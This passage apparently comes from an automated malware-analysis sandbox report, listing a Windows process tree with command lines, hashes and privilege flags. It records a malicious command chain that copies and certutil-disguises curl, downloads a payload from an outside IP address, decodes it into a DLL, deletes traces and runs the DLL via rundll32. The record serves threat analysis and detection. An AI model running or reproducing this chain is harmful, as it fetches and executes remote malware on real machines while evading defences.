        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
        Imagebase:0x4a610000
        File size:345'088 bytes
        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:19
        Start time:09:52:23
        Start date:22/07/2024
        Path:C:\Windows\System32\xcopy.exe
        Wow64 process (32bit):false
        Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
        Imagebase:0xfffa0000
        File size:43'008 bytes
        MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:20
        Start time:09:52:24
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
        Imagebase:0xff760000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:21
        Start time:09:52:24
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
        Imagebase:0xff350000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:22
        Start time:09:52:24
        Start date:22/07/2024
        Path:C:\Users\user\AppData\Local\Temp\curl.exe
        Wow64 process (32bit):false
        Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
        Imagebase:0x13f300000
        File size:530'944 bytes
        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:23
        Start time:09:52:26
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
        Imagebase:0xffee0000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:24
        Start time:09:52:26
        Start date:22/07/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
        Imagebase:0xff780000
        File size:45'568 bytes
        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        No disassembly